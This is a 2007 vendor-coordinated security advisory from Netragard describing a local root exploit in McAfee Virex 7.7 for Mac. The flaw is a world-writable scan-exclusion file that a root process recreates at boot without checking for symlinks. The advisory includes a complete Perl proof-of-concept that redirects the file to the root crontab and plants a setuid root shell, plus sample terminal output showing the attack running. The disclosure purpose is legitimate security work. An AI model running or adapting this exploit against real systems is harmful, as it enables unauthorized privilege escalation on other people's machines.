-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard,  L.L.C  Advisory* *******************

      
                     Strategic Reconnaissance Team

              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."





[POSTING NOTICE]
- -----------------------------------------------------------------------
If you intend to post this advisory on your web page please create a
clickable link back to the original Netragard advisory as the contents
of the advisory may be updated.

<a href=http://www.netragard.com/html/recent_research.html>
Netragard Research
</a>





[About Netragard]
- -----------------------------------------------------------------------
Netragard is a unique I.T. Security company whose services are
fortified by continual vulnerability research and development. This
ongoing research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals
and not those of automated scanners and tools.  This advisory is the
product of research done by the Strategic Reconnaissance Team.





[Advisory Information]
- -----------------------------------------------------------------------
Contact        : Adriel T. Desautels
Researcher      : Kevin Finisterre
Advisory ID      : NETRAGARD-20070220
Product Name      : McAfee VirusScan for Mac (Virex)
Product Version      : <= Virex 7.7
Vendor Name      : McAfee
Type of Vulnerability    : Local root exploit and Scan Bypass
Effort        : Easy



[Product Description]
- -----------------------------------------------------------------------
Guard your Macintosh systems and users against all types of viruses and
malicious code, even new unknown threats with McAfee VirusScan for Mac."

- -- http://www.mcafee.com  --





[Technical Summary]
- -----------------------------------------------------------------------
McAfee Virex contains an exploitable feature that enables users to
define what files should be excluded for scanning. This feature relies
on a configuration file with insecure privileges and is located in
/Library/Application Support. Any user on the system can modify or
delete the configuration file thus affecting what Virex will scan.

A simple example of such a modification would be to echo into the file
which in turn would cause Virex to ignore all files on the entire system.


[Technical Details]
- -----------------------------------------------------------------------
An exploitable vulnerability exists in McAfee Virex that can be used to
gain root privileges on an affected system.  This vulnerability exists
within the feature that enables users to define files for scan exclusion.
The configuration file used to store scan exclusion files has insecure
permissions of "rw-rw-rw" and as such can be modified or removed by any
user.

Upon system boot the VShieldCheck process that runs with root privileges
verifies the existence of the VShieldExecute.txt file located at:

/Library/Application/Sypport/Virex/VShieldExecute.txt

If VShieldCheck does not find the file at boot then it recreates the
file with the rw-rw-rw permissions. The exact command that it uses to
set those permissions is shown below:

SNOsoft-virexuser$ strings /usr/local/vscanx/VShieldCheck | grep chmod
/bin/chmod a+rw '%s' >/dev/null 2>&1

The VShieldCheck process does not check for symlinks prior to creating
the VShieldExecute.txt file. If an attacker creates a symlinks to:

/var/cron/tabs/root

 from

/Library/Application Support/Virex/VShieldExclude.txt

then the file /var/cron/tabs/root will be created with writable
permissions by the VShieldCheck process at the next system boot.
Once the file is created the attacker can insert arbitrary commands
into the newly created cron file that will be executed with root
privileges.

Example:

SNOsoft-virexuser$ crontab -l
crontab: no crontab for virexuser
SNOsoft-virexuser$ Desktop/pwn_virex.pl

Usage: Desktop/pwn_virex.pl <target>

Targets:

        0 . Virex 7.7.dmg

SNOsoft-virexuser$ Desktop/pwn_virex.pl 0
*** Target: Virex 7.7.dmg "/Library/Application
Support/Virex/VShieldExclude.txt"
wait for a reboot a cron run...
SNOsoft-virexuser$ crontab -l
* * * * * /usr/bin/perl /Users/Shared/droptab.pl
SNOsoft-virexuser$ ls -al /Library/Application\ Support/Virex/
total 88
drwxrwxr-x    5 root      admin    170 Oct 15 22:08 .
drwxrwxr-x   10 root      admin    340 Nov  3 11:11 ..
lrwxr-xr-x    1 virusbar  admin     19 Oct 15 22:08 VShieldExclude.txt
- -> /var/cron/tabs/root
- -rwxr-xr-x    1 root      wheel    530 Aug 18  2005
com.mcafee.virex.eupdate.plist
- -rwxr-xr-x    1 root      admin  32813 Aug 18  2005 digest.plist

After a reboot and a cycle of cron there will be a setuid root shell at
/Users/Shared/shX


[Proof Of Concept]
- -----------------------------------------------------------------------

#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# Following symlinks is bad mmmmmmmmmmkay!
#

$dest = "/var/cron/tabs/root";

$tgts{"0"} = "Virex 7.7.dmg:\"/Library/Application
Support/Virex/VShieldExclude.txt\"  ";

unless (($target) = @ARGV) {
        print "\n\nUsage: $0 <target> \n\nTargets:\n\n";

        foreach $key (sort(keys %tgts)) {
                ($a,$b) = split(/\:/,$tgts{"$key"});
                print "\t$key . $a\n";
        }

        print "\n";
        exit 1;
}

($a,$b) = split(/\:/,$tgts{"$target"});
print "*** Target: $a $b\n";

# Set aside a backdoor that we will chmod and chown later
open(BD,">/tmp/pwnrex.c");
printf BD "main()\n";
printf BD "{ seteuid(0); setegid(0); setuid(0); setgid(0);
system(\"/bin/sh -i\"); }\n";
#system("gcc -o /Users/Shared/shX /tmp/pwnrex.c");
system("cp /usr/bin/id  /Users/Shared/shX");  # this is for those
without gcc.

# set aside root crontab dropper
open(PH,">/Users/Shared/droptab.pl");
print PH "system\(\"echo \'* * * * * /usr/sbin/chown root:
/Users/Shared/shX; /bin/chmod 4755 /Users/Shared/shX\' >
/var/cron/tabs/root\"\)\;\n";

# rm the existing log file and symlink it to the root crontab file. A
reboot will be required to exploit this.
system("rm -rf $b; ln -s $dest $b");

# start up a crontab request that will be *VERY* useful after the
machine has rebooted.
system("echo '* * * * * /usr/bin/perl /Users/Shared/droptab.pl; sleep
90; crontab /Users/Shared/xxx' >
/tmp/user_cron");
system("echo '* * * * * /usr/bin/id' >  /Users/Shared/xxx");
system("crontab /tmp/user_cron");

print "wait for a reboot and a cron run...\n"


*** The code above will provide a root shell ***

Note:
Netragard's SNOsoft Research Team was able to use this issue
perform privilege escalation and gain root privileges.


[Vendor Status]
- -----------------------------------------------------------------------
Vendor Notified on 11/06/06
Vendor Patched on 02/13/07
Vendor advisory and patch has been posted at the following URL:

https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=
518722&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=518722

McAfee engineers were very helpful throughout the entire process.


[Disclaimer]
- ----------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

<a href="http://www.netragard.com>
http://www.netragard.com
</a>




-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFF5LatQwbn1P9Iaa0RAojQAJ9VVWHCVnLDg2yG4KBt1crLC0+5NQCfZFQR
10JV11ASCMCVdPikVgMDzbk=
=Z34O
-----END PGP SIGNATURE-----